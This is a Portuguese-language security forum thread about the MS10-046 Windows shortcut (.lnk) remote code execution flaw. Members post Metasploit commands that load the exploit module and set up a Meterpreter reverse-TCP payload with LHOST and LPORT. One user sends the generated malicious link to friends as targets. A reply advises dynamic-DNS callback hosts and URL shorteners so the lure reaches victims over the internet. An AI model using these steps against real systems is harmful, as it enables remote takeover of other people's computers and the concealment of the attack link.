Page 1 of 2 12 LastLast
Results 1 to 10 of 22

Thread: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video Demo

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    May 2010
    Location
    Rio de Janeiro
    Posts
    13

    Exclamation [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video Demo

    Criei um vídeo demonstrando a vulnerabilidade exposta no post anterior "Vulnerabilidade no sistema de arquivos de atalhos .lnk" que afeta versões como Windows 7, Vista, XP, 2003 e 2008, utilizei o recente exploit disponibilizado no Metasploit carga "ms10_xxx_windows_shell_lnk_execute.rb" e consegui obter acesso ao computador de teste, não precisa executar o arquivo .lnk, a visualização, interação ja faz com que o atacante consiga controle total da vítima.

    Para maiores informações sobre a vulnerabilidade acessem:

    Microsoft Security Advisory (2286198): Vulnerability in Windows Shell Could Allow Remote Code Execution
    Computer Security Research - McAfee Labs Blog

    obs: Não repare a edição é meu primeiro vídeo! =o)



    Link Video: YouTube - Vulnerability in Windows Shell Could Allow Remote Code Execution!

  2. #2
    Good friend of the forums spawn's Avatar
    Join Date
    Jan 2010
    Posts
    280

    Default Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De

    Parabéns, muito bem feito e de fácil entendimento

  3. #3
    Junior Member J4rll3y's Avatar
    Join Date
    Jul 2010
    Posts
    31

    Default Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution

    Sera que alguem poderia me mostrar o caminho que ele usa na vídeo aula?

    eu entendi por isso: use exploit/windows/browser ms10_xxx_windows_shell_lnk_execute.rb

    Mas está dando erro

  4. #4
    Good friend of the forums espreto's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    303

    Default Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De

    Quando você não souber a localização de algum exploit/auxiliary/nops/etc..., use o comando "search".

    Code:
    msf > search ms10_xxx[*] Searching loaded modules for pattern 'ms10_xxx'...
    
    Exploits
    ========
    
        Name                                                                           Rank                   Description
         ----                                                                            ----                    ---------
       windows/browser/ms10_xxx_windows_shell_lnk_execute       excellent              Microsoft Windows Shell LNK Code Execution
    
    msf >
    Ok?

    Att,
    (gdb) disass m(y_br)ain

    ®

  5. #5
    Good friend of the forums espreto's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    303

    Default Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De

    Reparando o video agora, não é necessário digitar o que vem após o URIPATH /.

    Digitando apenas o IP do Backtrack já se ganha a shell.

    Att,
    (gdb) disass m(y_br)ain

    ®

  6. #6
    Junior Member J4rll3y's Avatar
    Join Date
    Jul 2010
    Posts
    31

    Default Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De

    espreto

    Obrigado pela esplicação

    Tudo certo

  7. #7
    Just burned his ISO pinha's Avatar
    Join Date
    Jan 2011
    Location
    Piracicaba/sp
    Posts
    9

    Default Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De

    Ae galera blz sou novo aqui primeiro post rs..
    Chequei essa falha aqui a uns dias.. no Backtrack 4 r2

    o exploit para o lnk que vem com a distro em si é esse deve ser uma atualização?

    Code:
    msf > search lnk[*] Searching loaded modules for pattern ´lnk´...
    
    windows/browser/ms10_046_shortcut_icon_dllloarder
    Code:
    use windows/browser/ms10_046_shortcut_icon_dllloarder
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 10.0.2.15 
    set LPORT 4444
    apos isso gerou o link e a escuta na 4444 mas nao foi...
    rodei o meta no blacktrack pelo virtualbox.

    abrass

  8. #8
    Senior Member Bhior's Avatar
    Join Date
    Apr 2010
    Posts
    152

    Exclamation Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De

    Quote Originally Posted by pinha View Post
    Ae galera blz sou novo aqui primeiro post rs..
    Chequei essa falha aqui a uns dias.. no Backtrack 4 r2

    o exploit para o lnk que vem com a distro em si é esse deve ser uma atualização?

    Code:
    msf > search lnk[*] Searching loaded modules for pattern ´lnk´...
    
    windows/browser/ms10_046_shortcut_icon_dllloarder
    Code:
    use windows/browser/ms10_046_shortcut_icon_dllloarder
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 10.0.2.15 
    set LPORT 4444
    apos isso gerou o link e a escuta na 4444 mas nao foi...
    rodei o meta no blacktrack pelo virtualbox.

    abrass
    Pela natureza do sploit, pude perceber que você configurou errado o metasploit.

    para saber como configurar corretamente "show options"

    []'

  9. #9
    Just burned his ISO pinha's Avatar
    Join Date
    Jan 2011
    Location
    Piracicaba/sp
    Posts
    9

    Default Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De

    Quote Originally Posted by Bhior View Post
    Pela natureza do sploit, pude perceber que você configurou errado o metasploit.

    para saber como configurar corretamente "show options"

    []'
    entao Bhior por esse deve estar mesmo.. agora axei o exploit mensionado no inicio pelo packetstorm baixei pelo virualbox e add aos modulos/browser
    rodei...
    Code:
    use windows/browser/ms10_xxx_windows_shell_lnk_execute
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.0.2.15
    set LPORT 4444
    exploit
    gerou normal o link do client
    \\10.0.2.15\sRaVXmUk\
    enviei pra alguns amigos para testar mas nada de abrir a sessao...

  10. #10
    Good friend of the forums espreto's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    303

    Default Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De

    gerou normal o link do client
    \\10.0.2.15\sRaVXmUk\
    enviei pra alguns amigos para testar mas nada de abrir a sessao...
    Com certeza nao abrirá nenhuma sessão!
    Dê uma estudada sobre redes de computadores, endereçamento de IPs, entenda o que é LAN, WAN, MAN, PAN, etc... Se realmente quer aprender, você deve saber no mínimo os tópicos citados.

    Procure a respeito dos payload *dns e utilize tbm o DynDns, com isso você pode deixar seu LHOST como blablabla.dyndns.net, exemplo:

    Code:
    set LHOST blablabla.dyndns.net
    Ainda você pode utilizar os encurtadores de URL para o link acima!
    Se não entendeu nada do que falei, pode estudar mais um pouco!

    Att,
    (gdb) disass m(y_br)ain

    ®

Page 1 of 2 12 LastLast

Similar Threads

  1. [Video] Remote Desktop com VNC via metasploit
    By Bhior in forum Tutoriais e Howtos
    Replies: 0
    Last Post: 06-24-2010, 04:11 PM
  2. Video Demo "Vom POC zum Exploit SEH" by ozzy
    By ozzy66 in forum Tutorials und Howtos
    Replies: 5
    Last Post: 01-20-2010, 10:41 AM
  3. Replies: 9
    Last Post: 07-26-2009, 10:42 AM
  4. Data Execution Prevention (DEP) in Windows XP and Vista Video
    By Irongeek in forum OLD General IT Discussion
    Replies: 0
    Last Post: 06-08-2008, 06:18 PM
  5. psexec - Microsoft Windows Authenticated User Code Execution
    By imported_dmshady001 in forum OLD Pentesting
    Replies: 4
    Last Post: 04-13-2008, 02:39 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •